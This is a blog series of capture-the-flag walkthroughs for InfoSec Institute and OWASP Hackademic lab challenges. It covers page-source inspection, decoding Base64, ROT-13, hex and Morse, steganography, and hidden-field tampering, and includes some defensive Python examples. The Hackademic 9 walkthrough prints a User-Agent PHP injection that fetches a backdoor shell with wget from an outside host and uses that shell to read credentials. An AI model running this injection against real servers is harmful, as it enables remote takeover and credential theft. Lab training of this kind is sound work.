capture the flag, hacking, web application security

InfoSec Institute CTF Challenge #8

Another day, another challenge…

Today’s challenge will be on CTF Challenge #8 from InfoSec Institute.

Going to the following link, we see the following page.

infosec_8_intro

We’re asked to download a file.

Doing our trick of right click, view page source, we see the following:

infosec_8_pagesource

We see the file that we need to download, called “app.exe”.

Downloading and opening the file, we notice that the application runs the netstat command, listing our network information.

Since our usual tricks do not work, we need another way to look inside the application.

One option is to use the Linux strings command.

The strings command extracts human-readable text (runs of printable characters) from a file, which is how we can inspect a binary without a decompiler.

If you are working on a Windows machine (like I am), you can download the Cygwin emulator, which lets you run simple Linux commands on Windows.

To download Cygwin, go here.

Note: when installing, make sure you add the binutils package, which provides the strings command.

Copy the app.exe file into the Cygwin directory (the one you specified during installation) so you can navigate to it.

After installing Cygwin and running the strings command on app.exe, we see the following:

infosec_8_flag

We found the flag – infosec_flagis_0x1a!
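The strings approach, as an added example that is not part of the original post: a small Python reimplementation of strings(1) run over a constructed byte blob standing in for app.exe (not the real binary), with a filter that narrows the output to the flag prefix the way strings | grep would.

```python
import re
from typing import List

# Constructed stand-in for app.exe: junk bytes around a few printable runs.
# Not the real challenge binary; the flag value is the one the write-up reports.
SAMPLE_BINARY = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    b"This program cannot be run in DOS mode.\r\n$\x00\x00\x00"
    b"\x01\x02\x03netstat -an\x00\x00\x7f\x80"
    b"infosec_flagis_0x1a\x00\x00\x00\xfe\xfd"
    b"ab\x00cd\x00"  # runs shorter than min_len are dropped, as strings(1) does
)

def strings(data: bytes, min_len: int = 4) -> List[str]:
    """Return every run of at least min_len printable ASCII bytes (like strings(1))."""
    # strings(1) counts 0x20..0x7e plus tab as printable by default.
    pattern = rb"[\x20-\x7e\t]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]

def find_flags(data: bytes, prefix: str = "infosec_flagis_") -> List[str]:
    """Narrow the output to strings carrying the CTF flag prefix (strings | grep)."""
    return [s for s in strings(data) if prefix in s]

if __name__ == "__main__":
    for s in strings(SAMPLE_BINARY):
        print(s)
    print("flags:", find_flags(SAMPLE_BINARY))
```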

Lessons learned:

Again, our normal trick of viewing the page source did not work. We noticed that when we executed the program, it ran the netstat command to gather information on our network. From there we decided that we would need to look inside the application to see if the flag was hidden in there. It turns out it was. Overall lesson: be flexible with your tool belt and think outside of the box!

capture the flag, hacking, web application security

InfoSec Institute CTF Challenge #7

Another day, another challenge…

Today’s challenge will be exploring InfoSec Institute CTF Challenge #7.

Going to the following link we’re presented with the following:

infosec_7_beginning

Doing a right click, view page source, we see the following:

infosec_7_pagesource

Hmm… this doesn’t provide us with any information.

Going to the developer tools (F12) we see the following:

infosec_7_developertools

Still not giving us a lot of information.

Next, we’re going to use ZAP to spider the site to see if we can get any more information.

To configure ZAP, review the following link HERE.

Spidering the site we’re still not seeing a lot of information…

infosec_7_zapproxy

Looking at the other pages of the challenge, we notice that they follow the pattern “level<number>”. Let’s change 404.php to levelseven.php and see what we get.

Changing the site we see a blank page:

infosec_7_levelseven

Going back to ZAP we see the following:

infosec_7_levelseven_ZAP

Looking at the response, we notice that levelseven.php returns a 200 “OK” status. Next to the status we see an odd-looking encoded string ending in “==”. Could this be Base64 encoding? Let’s try it.

Going to Google and typing in “base 64 decoder”, we get the following link.

Putting in our encoded string, we get the following:

infosec_7_flagfound

We found the flag – infosec_flagis_youfoundit!
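The “ends in ==, could this be Base64?” reasoning above, as an added example that is not part of the original post: a Python screen for Base64-looking header values that decodes only when the result is printable text. The sample value is constructed as the Base64 form of the flag the write-up reports, not copied from the challenge response.

```python
import base64
import binascii
import re
from typing import Optional

# Constructed header value: Base64 of the flag the write-up reports.
SAMPLE_VALUE = "aW5mb3NlY19mbGFnaXNfeW91Zm91bmRpdA=="

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def looks_like_base64(value: str) -> bool:
    """Cheap screen: Base64 alphabet only, length a multiple of 4, at most '==' padding."""
    return len(value) % 4 == 0 and B64_RE.fullmatch(value) is not None

def try_decode(value: str) -> Optional[str]:
    """Decode if the value looks like Base64 and yields printable ASCII, else None."""
    if not looks_like_base64(value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None          # valid Base64, but the bytes are not text
    return text if text.isprintable() else None

def find_flag(value: str, prefix: str = "infosec_flagis_") -> Optional[str]:
    """Return the decoded flag when a header value decodes to one."""
    text = try_decode(value)
    return text if text and text.startswith(prefix) else None

if __name__ == "__main__":
    print(find_flag(SAMPLE_VALUE))
```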

Lessons learned:

Don’t depend on one solution. You should have multiple tools in your tool belt! We tried view page source, but that didn’t work. Looking at the network traffic inside the developer tools did not help either. When all else fails, we can use a proxy. After configuring the proxy we still didn’t see anything. When we realized that the page did not follow the pattern of the other pages in the CTF challenge, we decided to go to the real level seven page. Once we did this (with our intercepting proxy on) we noticed that we received a valid response containing a Base64-encoded string. Decoding it, we were presented with the flag! The developer tried security through obscurity by presenting us with a red herring in the 404.php page. Security through obscurity doesn’t work: we found the pattern of the challenge and were able to solve it.

capture the flag, hacking, web application security

InfoSec Institute CTF Challenge #6

Another day, another challenge…

Today’s challenge will be on the InfoSec Institute CTF Challenge #6.

See scenario below:

infosec_6_intro

Viewing the page source, we see the following:

infosec_6_pagesource

We see that there’s a pcap file if we select yes.

Opening the file in Wireshark (which can be downloaded HERE), we see the following:

infosec_6_wireshark

Wireshark is a program used to analyze network traffic. Most of the traffic in this file can be ignored, as a lot of what is displayed is noise.

Looking at the first packet (UDP) we see the following:

infosec_6_udp_packet

We notice a string of letters and digits… possibly this is hexadecimal encoding?

Going to Google and searching for “hexadecimal decoding”, we see the following link as the first result.

Clicking on the link and typing in the encoded string, we get the following:

infosec_6_finished

We found the flag!
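The packet-inspection step above, as an added example that is not part of the original post: Python that builds a constructed IPv4/UDP datagram (no real capture is used), walks the headers to the UDP payload the way Wireshark does, and decodes the payload if it is a hex string. The write-up does not quote the real flag, so the payload here is an invented placeholder.

```python
import struct
from typing import Optional

# Placeholder flag: the write-up does not quote the real value, so this is invented.
PLACEHOLDER_FLAG = "infosec_flagis_PLACEHOLDER"

def build_udp_packet(payload: bytes, src: str = "10.0.0.1", dst: str = "10.0.0.2",
                     sport: int = 5555, dport: int = 7777) -> bytes:
    """Constructed IPv4+UDP packet (no Ethernet header, checksums left zero) for the demo."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     bytes(int(o) for o in src.split(".")),
                     bytes(int(o) for o in dst.split(".")))
    return ip + udp

def udp_payload(packet: bytes) -> bytes:
    """Step over the IPv4 header (honouring IHL) and the 8-byte UDP header."""
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 17:                     # IPv4 protocol number 17 = UDP
        raise ValueError("not a UDP packet")
    _sport, _dport, length, _csum = struct.unpack("!HHHH", packet[ihl:ihl + 8])
    return packet[ihl + 8:ihl + length]     # UDP length counts the 8-byte header

def decode_hex_text(payload: bytes) -> Optional[str]:
    """If the payload is an ASCII hex string, return the text it encodes, else None."""
    s = payload.decode("ascii", errors="replace").strip()
    if not s or len(s) % 2 or any(c not in "0123456789abcdefABCDEF" for c in s):
        return None
    return bytes.fromhex(s).decode("ascii", errors="replace")

# The constructed capture: the placeholder flag hex-encoded inside a UDP datagram.
PACKET = build_udp_packet(PLACEHOLDER_FLAG.encode().hex().encode())

if __name__ == "__main__":
    print(udp_payload(PACKET))
    print(decode_hex_text(udp_payload(PACKET)))
```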

Lessons learned:

  1. Download Wireshark!
  2. Inspect the packets, and pay attention to those that stand out. Usually the suspicious packets hold clues!
  3. These clues won’t give us the pot of gold on the first try. Most of the data will be obscured, so we will need to encode or decode it.
  4. Once we encode or decode it, usually the data will be there!

FYI – thenewboston on YouTube has a good beginner tutorial on Wireshark, which can be found HERE.

capture the flag, hacking, web application security

OWASP Hackademic Challenge 9

Another day, another challenge.

Today’s post will be on the ninth challenge from the OWASP Hackademic Challenge.

Below is the scenario:

A friend of yours has set up a news blog at slagoff.com. However, he is kind of worried regarding the security of the news that gets posted on the blog and has asked you to check how secure it is.

Your objective is to determine whether any vulnerabilities exist that, if exploited, can grant access to the blog’s server.

Hint: A specially-tailored backdoor shell can be found at "http://www.really_nasty_hacker.com/shell.txt".

Below is the solution:

Clicking the first link we are presented with the following screen:

challenge9intro

Doing a right click, view page source we get the following:

challenge9pagesource

We notice a hidden field named page with the value answer.php. Hmm… let’s see if we can access this page.

Putting that address in the URL bar, it seems we cannot access the file.

challenge9answerphpnotfound

From the description we know that we need to fetch a file from http://www.really_nasty_hacker.com/shell.txt.

We know that our page is using PHP. Let’s see if we can modify the User-Agent using PHP syntax.

Opening Tamper Data after we enter the comment, we’re presented with the following:

challenge9tamperdatapart2

Changing the User-Agent to:

<?system("wget http://www.really_nasty_hacker.com/shell.txt");?>

Pressing “OK” we get the following:

challenge9successful

Our script was uploaded successfully!

Going to the new site we see the following:

challenge9commandline

Hmm… We’re presented with a command line similar to challenge 8!

Let’s run ls to see what we have on the file system.

challenge9lsoutput

We see that there is a file named “sUpErDuPErL33T.txt”.

Let’s see what’s in this file.

challenge9logininfo

We’re presented with login information.

Looking back at the directory listing, we see another file, adminpanel.php.

Going to that file we see the following:

challenge9adminportalphp

An admin portal!

Let’s enter our login information and see what we get:

challenge9adminportallogin

challenge9congrats

We passed the challenge!!!

Lessons learned:

We did our right click, view page source, which showed a hidden field pointing to answer.php. Trying to access that file didn’t help us. Next, by changing the User-Agent, we were able to get our file onto the file system. Going to that file on the server, we noticed that it allows us to execute commands. Executing commands, we were able to find the login information and log in successfully.

Use the knowledge you’ve learned to solve the next challenge. We were first introduced to user-agents in challenge #5 with the p0wnbrowser product. We know that we can change the user-agent to show content that we would’ve never noticed.
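From the defender’s side, the User-Agent trick above works only because the application records the header somewhere PHP later executes. As an added example that is not part of the original post or the challenge code, this Python parses constructed Combined Log Format access-log lines (invented, with a placeholder host) and flags entries whose User-Agent carries PHP tags or shell-style calls, plus a helper that neutralises such a value before it is written anywhere an include could reach.

```python
import re
from typing import Dict, List, Optional

# Constructed access-log lines (Combined Log Format); not from the challenge server.
# The third line carries the kind of User-Agent the write-up describes.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2014:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.6 - - [10/Oct/2014:13:55:40 +0000] "POST /comment.php HTTP/1.1" 302 0 "-" "curl/7.38.0"
10.0.0.7 - - [10/Oct/2014:13:56:02 +0000] "POST /comment.php HTTP/1.1" 200 87 "-" "<?system('wget http://EXAMPLE-HOST/shell.txt');?>"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A PHP open tag or a shell-style function call has no business in a User-Agent.
SUSPICIOUS_UA = re.compile(r"<\?(php|=)?|\b(system|exec|passthru|shell_exec|eval)\s*\(", re.I)

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one Combined Log Format line into named fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_poisoned_entries(log_text: str) -> List[Dict[str, str]]:
    """Return the parsed entries whose User-Agent looks like injected PHP code."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and SUSPICIOUS_UA.search(entry["ua"]):
            hits.append(entry)
    return hits

def safe_ua(ua: str) -> str:
    """Escape angle brackets so a logged User-Agent can never form a PHP open tag.
    The real fix is to never include() a file attackers can write to; this is defence in depth."""
    return ua.replace("<", "&lt;").replace(">", "&gt;")

if __name__ == "__main__":
    for hit in find_poisoned_entries(SAMPLE_LOG):
        print(hit["ip"], hit["ts"], safe_ua(hit["ua"]))
```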

capture the flag, hacking, web application security

InfoSec Institute CTF Challenge #5

Another day, another challenge…

Today’s challenge is #5 from the InfoSec Institute CTF Challenge.

Clicking on the following link we’re presented with the following:

infosec_5_intro

After clicking the checkbox to prevent the page from displaying additional dialogs, and adding “view-source:” to the URL box, we see the following:

infosec_5_pagesource

Viewing the page source further, we see the reason we were getting multiple alert boxes: the alert is inside an infinite for loop. Read more about for loops HERE.

Looking inside the for loop, we see that there is an image titled “aliens”. Clicking on the file, we see the following:

infosec_5_aliens_gif

At first when I read the meme I was at a loss, as I have never seen or heard this quote before. After doing some digging online, it hit me. What if there’s another secret meaning to this message?

How does one add a secret inside of an image? Steganography.

Saving the image and doing a quick Google search for an online steganography decoder, we’re presented with this site.

Uploading our file and pressing decode, we get the following:

infosec_5_decode

Binary. OK… this doesn’t seem helpful, or is it?

Doing another Google search for a binary-to-ASCII decoder, we’re presented with this link.

Entering our binary, we get the following:

infosec_5_end

We found the flag!

Lessons learned:

  1. Don’t be deterred by the multiple alert boxes!
  2. Use our trick of adding “view-source:” to the beginning of the URL.
  3. Reviewing the page source, we noticed a file.
  4. Opening the file, we noticed it was a meme.
  5. Research what the meme meant.
  6. After finding the meaning, use tools to extract the data we need.
  7. Don’t be deterred that the extracted data was not in our preferred format (binary rather than words).
  8. Use Google to research how to get the extracted data into the preferred format.
  9. Finally, find our flag.

capture the flag, hacking, web application security

InfoSec Institute CTF Challenge 3

Another day, another challenge…

Today’s challenge will be #3 from the InfoSec Institute.

Going to the following link we’re presented with the following:

infosec_3_intro

Looking at the screen, we’re presented with a QR code.

Doing a right click, view page source, we see the following:

infosec_3_pagesource

Doing a quick Google search for “QR code decoder”, we go to the following site.

Entering the proper information and uploading our file, we see the following:

infosec_3_morsecode

Doing a Google search on the output, we find that it is actually Morse code!

Another Google search to decode the code gives us the following site.

Putting our code inside of the decoder we get the following:

infosec_3_finalresult

We found the flag!!!

Lesson learned:

Right click, view page source saves the day again. By doing this we found that there is a QR code being displayed on the page. A quick Google search found a QR code decoder, which gave us Morse code. Another Google search yielded the flag.

When in doubt, view the page source and use Google searches!

capture the flag, hacking, web application security

InfoSec Institute CTF Challenge #4

Another day, another challenge…

Today’s challenge is #4 from the InfoSec Institute CTF challenge.

Going to the following link we see the following:

infosec_4_intro

Doing a right click, view page source, we see the following:

infosec_4_pagesource

Looking at the page we see the following hint – “Hypertext Transmission Protocol”

Pressing F12 to view the developer tools and going to the “Network” tab we see the following:

infosec_4_cookie

Inside the set-cookie we see “fusrodah=vasbfrp_syntvf_jrybirpbbxvrf”. This is interesting…

Doing a quick Google search and putting in the second half of our value, we get the following link for ROT-13.

ROT-13 is a rotation cipher: it shifts each letter 13 places through the 26-letter alphabet.

Using the following site and putting in our value, we get:

infosec_4_final

We retrieved the flag.
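The cookie decoding above, as an added example that is not part of the original post: Python that pulls the named value out of a Set-Cookie header (constructed here around the value the write-up quotes) and applies ROT-13, shifting letters only and leaving the underscores alone.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie header carrying the value the write-up quotes.
SET_COOKIE = "fusrodah=vasbfrp_syntvf_jrybirpbbxvrf; path=/"

def rot13(text: str) -> str:
    """Rotate each ASCII letter 13 places; digits, underscores and punctuation pass through."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + 13) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + 13) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)

def cookie_value(header: str, name: str) -> str:
    """Parse a Set-Cookie header the way a browser would and return one cookie's value."""
    jar = SimpleCookie()
    jar.load(header)
    return jar[name].value

def decode_cookie(header: str, name: str = "fusrodah") -> str:
    """Extract the cookie and undo the ROT-13 the challenge applied."""
    return rot13(cookie_value(header, name))

if __name__ == "__main__":
    print(decode_cookie(SET_COOKIE))
```

Because 13 is half of 26, rot13 is its own inverse: the same function both encodes and decodes.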

Lessons learned:

Use the hints provided. We tried our trusty right click, view page source, but that didn’t help us. Going back to the page we noticed that the hint was HTTP. Using the developer tools inside Chrome and going to the Network tab, we saw the files retrieved when accessing the site.

Clicking on the page and viewing the headers, we noticed that a cookie was being set. Searching for this value in Google, we were able to decode the message.

capture the flag, hacking, web application security

InfoSec Institute Capture The Flag #2

Another day, another challenge.

Today’s challenge will be on the second CTF challenge from the InfoSec Institute.

Below is the screen listed HERE when accessing the link:

infosec_2

Doing a right click, view page source, and scrolling down, we see the following:

infosec_2_pagesource

We see an img src that points to leveltwo.jpeg. Clicking the file, we get the following:

infosec_2_imgsrc

Going to the address bar and adding “view-source:” to the beginning of the URL, we get the following:

infosec_2_flag

We got the flag!

Lesson learned:

Once again, do the right click, view page source. At first it didn’t reveal much except that there was an image. Clicking on that image, we’re brought to a page with a non-rendered image. Viewing the source of that image, we see the flag. This is security through obscurity, which never works.

capture the flag, hacking, web application security

Infosec Institute – Capture the Flag #1

Another day, another challenge…

Today’s challenge is the first from the Infosec Institute. The website can be found HERE.

Clicking on Levels and selecting the first challenge, we see the following:

infosec_1

Doing a right click, view page source, we see the flag at the top of the page.

infosec_1_pagesource

Lesson learned:

When in doubt, do a right click and view the page source. Doing so reveals a lot of goodies about a website.

hacking, owasp, web application security

OWASP Hackademic Challenge 10

Another day, another challenge…

Today’s challenge will conclude the Hackademic Challenge.

Below is the scenario:

Would you like to become an active hacker?
How about becoming a member of the world’s largest hacker group:
The n1nJ4.n4x0rZ.CreW!

Before you can join though, you’ll have to prove yourself worthy by passing the test that can be found at: http://n1nj4h4x0rzcr3w.com

If you succeed in completing the challenge, you will get a serial number, which you will use for obtaining the password that will enable you to join the group.

Your objective is to bypass the authentication mechanism, find the serial number and be supplied with your own username and password from the admin team of the site.

Clicking the link we see the following screen:

challenge10intro

Doing a right click, page source we see the following:

challenge10pagesource

Looking at the line above the password line, we notice that there is a hidden field called “LetMeIn” which is set to false. What if we set this to true?

Going back to our original screen and clicking on Tools –> Web Developer Extension –> Forms –> Display Form Fields, we see the following screen:

challenge10formfields

Changing the field from “False” to “True” and pressing the “Login” button, we see the following:

challenge10encoding

Hmm… there’s an alert box containing an encoded string. Could this encoding contain the serial number?

Copying the encoded string and going to Google, we search for “Decoder online”. We found a website HERE.

Changing the encoding type from Base64 to URL encoding and pressing “Decode”, we see the following:

challenge10serialnumber

We have the serial number!

Going back to the challenge and pressing Enter we’re presented with the following screen:

challenge10email

Entering our name and serial number, and pressing the send button we see the following screen:

challenge10congrats

Lesson learned:

Our trick of right clicking and viewing the page source helped us. We noticed that there is a hidden field titled “LetMeIn”. Developers sometimes believe that because a field is hidden, a penetration tester cannot tamper with it. Nothing could be further from the truth.

After tampering with the hidden field, we next encounter an encoded string. Doing a quick Google search, we found an online encoder/decoder that we can use to decode it.

Once that decoding is done, we entered our name and serial number on the next screen and completed the challenge.
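The “LetMeIn” lesson above, as an added example that is not part of the original post or the challenge: a Python login handler in the shape the challenge implies (trusting a hidden form field the browser sends) next to a hardened one that ignores every client-controlled flag and verifies the password server-side. The user, password and salted PBKDF2 store are invented for the demo.

```python
import hashlib
import hmac
import os
from typing import Dict, Tuple

def make_record(password: str) -> Tuple[bytes, bytes]:
    """Per-user random salt plus a PBKDF2-SHA256 hash; plaintext is never stored."""
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

# Constructed credential store: the user and password are invented for the demo.
USERS: Dict[str, Tuple[bytes, bytes]] = {"alice": make_record("correct horse")}

def check_password(username: str, password: str) -> bool:
    """Server-side check; constant-time comparison avoids leaking match length."""
    record = USERS.get(username)
    if record is None:
        return False
    salt, stored = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(stored, candidate)

def vulnerable_login(form: Dict[str, str]) -> bool:
    """Mirrors the challenge: a hidden 'LetMeIn' field sent by the browser is trusted.
    Anything the client submits, hidden or not, is attacker-controlled input."""
    if form.get("LetMeIn", "false").lower() == "true":
        return True
    return check_password(form.get("username", ""), form.get("password", ""))

def hardened_login(form: Dict[str, str]) -> bool:
    """Only the credentials matter; extra fields in the POST body are ignored."""
    return check_password(form.get("username", ""), form.get("password", ""))

if __name__ == "__main__":
    tampered = {"username": "mallory", "password": "guess", "LetMeIn": "True"}
    print("vulnerable:", vulnerable_login(tampered), "hardened:", hardened_login(tampered))
```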